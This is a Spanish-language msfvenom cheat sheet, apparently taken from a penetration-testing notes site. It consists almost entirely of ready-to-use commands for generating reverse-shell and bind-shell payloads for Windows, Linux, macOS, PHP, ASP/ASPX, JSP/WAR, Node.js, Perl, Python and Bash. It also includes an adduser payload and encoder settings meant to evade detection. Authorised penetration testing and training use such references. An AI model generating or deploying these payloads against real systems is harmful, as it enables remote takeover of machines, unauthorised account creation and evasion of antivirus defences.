MSFVenom
msfvenom -p $PAYLOAD -e $ENCODER -f $FORMAT -i $ENCODECOUNT LHOST=$LHOST LPORT=$LPORT > $OUTPUT
msfvenom -l payloads # Payloads
msfvenom -l encoders # Encoders
msfvenom -l formats # Formatos
msfvenom -l archs # Arquitecturas
-b "\x00\x0a\x0d" # Caracteres a evitar
-f c # Formato
-e x86/shikata_ga_nai -i 5 # Encode e iteraciones del mismo
EXITFUNC=thread # Para windows
PrependSetuid=True # Úsalo cuando la shellcode vaya a ejecutar algo con SUID
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe > reverse.exe
msfvenom -p windows/meterpreter/bind_tcp RHOST=$RHOST RPORT=$LPORT -f exe > bind.exe
msfvenom -p windows/adduser USER=$USERNAME PASS=$PASSWORD -f exe > adduser.exe
msfvenom -p windows/shell/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe > prompt.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="$COMMAND" -f exe > pay.exe
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=$RHOST LPORT=$LHOST -f elf > bind.elf
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f macho > reverse.macho
msfvenom -p osx/x86/shell_bind_tcp RHOST=$RHOST LPORT=$LHOST -f macho > bind.macho
msfvenom -p php/meterpreter_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f raw > shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f aspx > reverse.aspx
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f raw > reverse.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f war > reverse.war
msfvenom -p nodejs/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT
msfvenom -p cmd/unix/reverse_perl LHOST=$LHOST LPORT=$LPORT -f raw > reverse.pl
msfvenom -p cmd/unix/reverse_python LHOST=$LHOST LPORT=$LPORT -f raw > reverse.py
msfvenom -p cmd/unix/reverse_bash LHOST=$LHOST LPORT=$LPORT -f raw > shell.sh
Última actualización 1yr ago